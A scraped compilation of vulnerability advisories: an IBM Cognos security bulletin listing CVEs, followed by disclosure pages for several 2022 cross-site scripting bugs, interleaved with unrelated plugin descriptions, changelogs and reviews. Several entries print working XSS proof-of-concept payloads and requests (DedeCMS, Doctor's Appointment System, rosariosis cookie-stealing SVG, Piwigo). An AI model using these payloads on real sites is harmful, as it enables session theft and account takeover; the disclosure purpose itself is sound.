IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.  IBM X-Force ID:  176609.

**CVEID:**   CVE-2020-4301  
**DESCRIPTION:**   IBM Cognos Analytics is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/176609 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2021-3749  
**DESCRIPTION:**   axios is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw in the trim function. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause an application to consume an excessive amount of CPU.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/208438 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2020-36518  
**DESCRIPTION:**   FasterXML jackson-databind is vulnerable to a denial of service, caused by a Java StackOverflow exception. By using a large depth of nested objects, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222319 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-29078  
**DESCRIPTION:**   Node.js ejs module could allow a remote attacker to execute arbitrary code on the system, caused by a server-side template injection flaw in settings\[view options\]\[outputFunctionName\]. By sending a specially-crafted HTTP request to overwrites the outputFunctionName option with an arbitrary OS command, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225116 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2021-29418  
**DESCRIPTION:**   Node.js netmask module could allow a remote attacker to bypass security restrictions, caused by improper handling of certain unexpected characters in an IP address string. By using a specially-crafted argument using octal literals, an attacker could exploit this vulnerability to bypass access control that is based on IP addresses.  
CVSS Base score: 9.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/199130 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

**CVEID:**   CVE-2021-28918  
**DESCRIPTION:**   Node.js netmask module is vulnerable to server-side request forgery, caused by the improper handling of mixed-format IP addresses. By using a specially-crafted argument using octal literals, an attacker could exploit this vulnerability to conduct SSRF, RFI, and LFI attacks to gain access to intranets, VPNs, containers, adjacent VPC instances, or LAN hosts.  
CVSS Base score: 9.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/198894 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

**CVEID:**   CVE-2021-39009  
**DESCRIPTION:**   IBM Cognos Analytics stores user credentials in plain clear text which can be read by a local privileged user.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/213554 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2020-28469  
**DESCRIPTION:**   Node.js glob-parent module is vulnerable to a denial of service. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a regular expression denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/196451 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2021-39045  
**DESCRIPTION:**   IBM Cognos Analytics could allow a local attacker to obtain information due to the autocomplete feature on password input fields.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/214345 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2021-43797  
**DESCRIPTION:**   Netty is vulnerable to HTTP request smuggling, caused by improper parsing of the HTTP transfer-encoding request header names. By sending a specially-crafted HTTP(S) transfer-encoding request header, an attacker could exploit this vulnerability to poison the web cache, bypass web application firewall protection, and conduct XSS attacks.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215118 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2021-44533  
**DESCRIPTION:**   Node.js could allow a remote attacker to bypass security restrictions, caused by the incorrect handling of multi-value Relative Distinguished Names. By crafting certificate subjects containing a single-value Relative Distinguished Name that would be interpreted as a multi-value Relative Distinguished Name, an attacker could exploit this vulnerability to bypass the certificate subject verification.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/216932 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-21824  
**DESCRIPTION:**   Node.js could provide weaker than expected security, caused by an error related to the formatting logic of the console.table() function. An attacker could exploit this vulnerability using console.table properties to allow an empty string to be assigned to numerical keys of the object prototype.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/216933 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2021-44531  
**DESCRIPTION:**   Node.js could allow a remote attacker to bypass security restrictions, caused by the improper handling of URI Subject Alternative Name (SAN) types. An attacker could exploit this vulnerability to bypass name-constrained intermediates.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/216930 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2021-44532  
**DESCRIPTION:**   Node.js could allow a remote attacker to bypass security restrictions, caused by a string injection vulnerability when name constraints were used within a certificate chain. An attacker could exploit this vulnerability to bypass the name constraints.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/216931 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2021-3807  
**DESCRIPTION:**   Chalk ansi-regex module for Node.js is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/209596 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2021-29823  
**DESCRIPTION:**   IBM Cognos Analytics is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/204465 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2021-20468  
**DESCRIPTION:**   IBM Cognos Analytics is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/196825 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2021-23438  
**DESCRIPTION:**   Node.js mpath module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By adding or modifying properties of Object.prototype using a \_\_proto\_\_ or constructor payload, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 5.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/208595 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2022-21803  
**DESCRIPTION:**   Node.js nconf module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw when using the memory engine. By adding or modifying properties of Object.prototype using a \_\_proto\_\_ or constructor payload, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/224357 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2022-30614  
**DESCRIPTION:**   IBM Cognos Analytics is vulnerable to a denial of service via email flooding caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume all available CPU resources.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/227591 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-36773  
**DESCRIPTION:**   IBM Cognos Analytics is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.  
CVSS Base score: 7.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/233571 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L)

**IBM X-Force ID:**   217968  
**DESCRIPTION:**   FasterXML jackson-databind is vulnerable to a denial of service, caused by an error when using JDK serialization to serialize and deserialize JsonNode values. By sending a specially crafted request, an attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217968 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**IBM X-Force ID:**   233967  
**DESCRIPTION:**   Maven OkHttp package could allow a remote attacker to obtain sensitive information, caused by the inclusion of sensitive information in an error message. By sending a specially-crafted request using an illegal character in a header value, an attacker could exploit this vulnerability to trigger an IllegalArgumentException whose message includes the full header value.  
CVSS Base score: 8.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/233967 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)

CVE-2020-4301: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

DedeCMS V5.7.97 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities at /dede/co_do.php via the dopost, rpok, and aid parameters.

**Dedecms V5.7.97 contain an XSS vulnerability**

1erkeU  于 2022-07-19 22:44:33 发布  551  收藏

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

**DedeCMS V5.7.97 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component /dede/co\_do.php via the dopost, rpok, aidparameters.****Abstract**

*   Affected product: DedeCMS V5.7.97
*   Attack type: Remote
*   Affected component: /dede/co\_do.php
*   payload: dopost=replace&rpok=1&aid='><scrIpt>alert(1)</script>\\

**Detail**

/dede/co_ do.php line 156, the $aid variable in the ShowMsg() function is controllable. The $aid variable is obtained from $_GET['aid'].

/include/common.func.php line 280, the $aid variable is a $gourl variable in the ShowMsg() function.

/include/common.func.php line 326 and line 321, $gourl variables are spliced into $msg variables and output without filtering.

**Recurrence**

    http://127.0.0.1/dede/co_do.php?dopost=replace&rpok=1&aid=%27%3E%3CscrIpt%3Ealert(666)%3C/script%3E

CVE-2022-36583: Dedecms V5.7.97 contain an XSS vulnerability_1erkeU的博客-CSDN博客

Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS) in CallRail, Inc. CallRail Phone Call Tracking plugin <= 0.4.9 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

CallRail is here to bring complete visibility to the marketers who rely on quality inbound leads to measure success. Our customers live in a results-driven world, and giving them a clear view into their digital marketing efforts is a first priority for CallRail. We see the opportunities in surfacing and connecting data from calls, forms, chat and beyond — helping our customers get to better outcomes.

Our WordPress plugin allows you to learn detailed information about the source and web session of every caller from your website using a process called Dynamic Number Insertion. It also powers our form tracking tool, which gives you the power to attribute form submissions back to their source and learn about what the user did on your site before submitting the form.

*   Learn more about CallRail.
*   Check out our WP plugin support documentation.

1.  Sign in to your CallRail account and click the **Settings tab**.
2.  Select the company you want from the dropdown menu.
3.  Find the WordPress plugin in the list of integrations and click **Instructions**.
4.  Download the plugin and follow the instructions listed.

Full documentation can be found here.

Constant integration issues with Adwords make our conversion data mostly useless. In Adwords this is a huge problem. They recently lost 2/3 of our all time call recordings!!!!! This data was priceless and is unrecoverable. Callrail's support is some of the worst I have encountered and even during emergency situations they are not in a hurry to help. Calls to support go unanswered and if we get a callback it is often the next day by someone who has little knowledge. We are finding a new company to work with and I would suggest others to do the same. I will update this post with a full breakdown of all our callrail issues once we have migrated to a new provider. Too many to list at the current moment 🙁

Read all 4 reviews

“CallRail Phone Call Tracking” is open source software. The following people have contributed to this plugin.

Contributors

*    apowellgt

**0.2**

*   Initial public release.

**0.3**

*   Update to version 2 of the javascript tracking script (swap.js)
*   Prompt the user to add an API key after installation.
*   Don’t insert the CallRail script if no API key is present.
*   Trim whitespace surrounding the API key before saving.

**0.3.1**

*   Update to version 3 of the javascript tracking script (swap.js)

**0.3.2**

*   Update to version 4 of the javascript tracking script (swap.js) which supports more advanced number replacement.

**0.3.3**

*   Update to version 5 of the javascript tracking script (swap.js)

**0.3.4**

*   Update to version 7 of the javascript tracking script (swap.js) and serve the script via the MaxCDN network (cdn.callrail.com).

**0.3.5**

*   Update to version 8 of the javascript tracking script (swap.js).

**0.3.6**

*   Update to version 10 of the javascript tracking script (swap.js).

**0.3.7**

*   Add a HTML comment so the CallRail support team can see when swap.js is installed via WordPress.

**0.3.8**

*   Update to version 11 of the javascript tracking script (swap.js).

**0.3.11**

*   Set Callrail cookies via HTTP using xhr request from swap.js script.

**0.4.0**

*   Added an optional feature to load required scripts as first-party through WordPress.

**0.4.1**

*   Various bug fixes.
*   Default first-party swap.js to on after testing if it is supported or not.

**0.4.2**

*   Fix bug where forms were not rendering for first-party enabled sites.

**0.4.3**

*   update the readme.

**0.4.4**

*   Change the default value for the “Enable As First Party Script” flag to false for initial Installations.

**0.4.5**

*   Add the newly required parameter “permission\_callback” to all custom REST endpoint definitions

**0.4.6**

*   Updating tested up to version.

**0.4.7**

*   Updating tested up to version. redeploy.

**0.4.8**

*   Updating tested up to version. redeploy.

**0.4.9**

*   Fixed End User IP Address detection

CVE-2022-36796: CallRail Phone Call Tracking

Authenticated (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in PluginlySpeaking Easy Org Chart plugin <= 3.1 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of July 29, 2022 and is not available for download. This closure is temporary, pending a full review.

No support anymore, pro Version not available, pure garbage. I don't know why this Plugin is still live.

This plugin seems perfect, unfortunately it itsn't up to date and is unusable on last versions of WordPress (impossibility to add several people on a chart).

Nice Plugin for creating multiple org chart.

Read all 3 reviews

“Easy Org Chart” is open source software. The following people have contributed to this plugin.

Contributors

*    PluginlySpeaking

CVE-2022-36355: Easy Org Chart

Doctor's Appointment System version 1.0 suffers from a cross site scripting vulnerability in register.php. Original discovery of cross site scripting in this version is attributed to Soham Bakore in February of 2021.

    # Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36203POC:POST /register.php HTTP/1.1Host: localhostusername=a"><script>alert(1337)</script>&password=123

Doctor's Appointment System 1.0 Cross Site Scripting

Weave GitOps Enterprise before 0.9.0-rc.5 has a cross-site scripting (XSS) bug allowing a malicious user to inject a javascript: link in the UI. When clicked by a victim user, the script will execute with the victim's permission. The exposure appears in Weave GitOps Enterprise UI via a GitopsCluster dashboard link. An annotation can be added to a GitopsCluster custom resource.

Weave GitOps is a powerful extension to Flux, a leading GitOps engine and CNCF project, which provides insights into your application deployments, and makes continuous delivery with GitOps easier to adopt and scale across your teams.

The web UI surfaces key information to help application operators easily discover and resolve issues. The intuitive interface provides a guided experience to build understanding and simplify getting started for new users; they can easily discover the relationship between Flux objects and navigate to deeper levels of information as required.

Weave GitOps is an open source project sponsored by Weaveworks - the GitOps company, and original creators of Flux.

**Why adopt GitOps?​**

> "GitOps is the best thing since configuration as code. Git changed how we collaborate, but declarative configuration is the key to dealing with infrastructure at scale, and sets the stage for the next generation of management tools"

\- Kelsey Hightower, Staff Developer Advocate, Google.

Adopting GitOps can bring a number of key benefits:

*   Faster and more frequent deployments
*   Easy recovery from failures
*   Improved security and auditability

To learn more about GitOps, check out these resources:

*   GitOps for absolute beginners - eBook from Weaveworks
*   Guide to GitOps - from Weaveworks
*   OpenGitOps - CNCF Sandbox project aiming to define a vendor-neutral, principle-led meaning of GitOps.
*   gitops.tech - supported by Innoq

**Getting Started​**

See Installation and Getting Started

**Features​**

*   **Applications view** - allows you to quickly understand the state of your deployments across a cluster at a glance. It shows summary information from kustomization and helmrelease objects.
*   **Sources view** - shows the status of resources which are synchronizing content from where you have declared the desired state of your system, for example Git repositories. This shows summary information from gitrepository, helmrepository and bucket objects.
*   **Flux Runtime view** - provides status on the GitOps engine continuously reconciling your desired and live state. It shows your installed GitOps Toolkit Controllers and their version.
*   Drill down into more detailed information on any given Flux resource.
*   Uncover relationships between resources and quickly navigate between them.
*   Understand how workloads are reconciled through a directional graph.
*   View Kubernetes events relating to a given object to understand issues and changes.
*   Secure access to the dashboard through the ability to integrate with an OIDC provider (such as Dex) or through a configurable cluster user.
*   Fully integrates with Flux as the GitOps engine to provide:
    *   Continuous Delivery through GitOps for apps and infrastructure
    *   Support for GitHub, GitLab, Bitbucket, and even use s3-compatible buckets as a source; all major container registries; and all CI workflow providers.
    *   A secure, pull-based mechanism, operating with least amount of privileges, and adhering to Kubernetes security policies.
    *   Compatible with any conformant Kubernetes version and common ecosystem technologies such as Helm, Kustomize, RBAC, Prometheus, OPA, Kyverno, etc.
    *   Multitenancy, multiple git repositories, multiple clusters
    *   Alerts and notifications

CVE-2022-38790: Introduction | Weave GitOps

Cross-site Scripting (XSS) - Stored in GitHub repository francoisjacquet/rosariosis prior to 8.9.3.

**Description**

I found XSS in the file upload function of the message function.

**Proof of Concept****Step**

1.First, access the latest version of the demo environment. "Https://www.rosariosis.org/demonstration/index.php"

2.Then log in with your student account. Student: username and password “student“

3.After logging in, access "MESSAGING > Write" from the menu on the left. (/demonstration/Modules.php?modname=Messaging/Write.php)

4.Then enter the title and message as appropriate.

5.Now upload the SVG file containing XSS to "File Attached".

6.Finally, select "Teach Teacher" as the destination and send.

7.Log in from here with your teacher's account. Teacher: username and password “teacher“

8.After logging in, access "MESSAGING > Messages" from the menu and select the message you just sent.

9.Then click on the last attached file and a pop-up screen will appear.

**Summary**

\-Endpoint: POST /demonstration/Modules.php?modname=Messaging/Write.php&search_modfunc=list&recipients_key=staff_id&subject=<title>&message=<message>&recipients_ids[0]=2&send=Send

\-Attachment: SVG file

\-Test Payload: <script type="text/javascript">alert(document.cookie)</script>

**Impact**

This vulnerability can steal a user's cookie.

**References**

*   https://owasp.org/www-community/vulnerabilities/Unrestricted\_File\_Upload
*   https://owasp.org/www-project-top-ten/2017/A7\_2017-Cross-Site\_Scripting\_(XSS)

CVE-2022-3072: Cross-site Scripting (XSS) - Stored in rosariosis

### Impact
An attacker could steal an admin's cookie

### Patches
The issue is fixed in 5.0.2

### References
[Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')](https://cwe.mitre.org/data/definitions/79.html)


**Cross-site Scripting in prestashop/productcomments**

Moderate severity GitHub Reviewed Published Aug 31, 2022 in PrestaShop/productcomments • Updated Aug 31, 2022

GHSA-prrh-qvhf-x788: Cross-site Scripting in prestashop/productcomments

Doctor's Appointment System 1.0 is vulnerable to Cross Site Scripting (XSS) via the admin panel. In addition, it leads to takeover the administrator account by stealing the cookie via XSS.

Submitted by hshnudr on Wednesday, June 8, 2022 - 10:13.

(Updated)

This project helps a certain medical establishment such as a clinic or a hospital clients/patients to request an appointment with a doctor online. This project can also help doctors to manage the schedules of their appointments with their patients. This doctor's appointment system will organize the schedules of each patient's appointment, which will be submitted as a request to the doctor they have selected. The system has 3 sides which are the administrator, the doctor, and the patient. The system admin will populate the list of the doctors with their specialties and along with the doctor's details and system credentials. The patients will browse the doctor's appointment system website to find a doctor that has the specialty of their needs. The patient can check the doctor's weekly schedule to help them to choose the day and time which they can comply for the appointment and they will submit their request for an appointment. After that, the doctors can view all their appointments and the appointment request of the patients for their availability.

****Admin's Side****

*   **Admin can add doctors, edit doctors, delete doctors;**
    
*   **Schedule new doctors sessions, remove sessions;**
    
*   **View patient details;**
    
*   **View booking of patients;**
    

****Doctor's Side****

*   **View their Appointment;**
*   **view their scheduled sessions;**
*   **view details of patients;**
*   **delete account;**
*   **edit account settings;**

**Patient's Side**

*   **create accounts themselves;**
*   **view their old booking;**
*   **delete account;**
*   **edit account settings;**

****HOW TO GET STARTED?****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** naming ****edoc****.
6.  **Import** the provided ****SQL**** file. The file is known as ****SQL\_Database\_edoc.sql**** located inside the **source code root** folder.
7.  **Browse** the **Doctor's Appointment System** in a **browser**. i.e. ****http://localhost/edoc-echanneling-main/****.

**DEFAULT USER ACCOUNTS OF THIS PROJECT******ADMIN****

Email: **\[email protected\]**  
Password: **123**

****Doctor****

Email: **\[email protected\]**  
Password: **123**

****Patient****

Email: **\[email protected\]**  
Password: **123**

**DEMO VIDEO**

****The Project was developed using the following:****

Apache Version: 2.4.39

PHP Version: 7.3.5

Server Software: Apache/2.4.39 (Win64) PHP/7.3.5

MySQL Version: 5.7.26

Web developer: Hashen Udara https://github.com/HashenUdara/

HashenUdara/edoc-doctor-appointment-system: Simple web project that made for e-channeling. (github.com)

****More Snapshots:****

*   3074 views

CVE-2022-36203: Doctor's Appointment System using PHP Free Source Code

Piwigo 12.3.0 is vulnerable to Cross Site Scripting (XSS) via /search/1940/created-monthly-list.

The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick a user to visit some crafted URL that is connected exactly to this system. Then he can trick the user to visit some malicious address that the victim will think is connected with the original web address it depending on the scenario. This can be dangerous for all users of this system.

GET /piwigo/index.php?/search/4863/created\-monthly\-list%22%3Ehttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcom%3CYZxWX%3E HTTP/1.1
Host: pwned\_host.com
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: en\-US,en;q\=0.5
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: pwg\_id\=hctfqtab45adhogo2suhq2mr0c; ssc\_phoneSwap\=0
Upgrade\-Insecure\-Requests: 1

Tag

#xss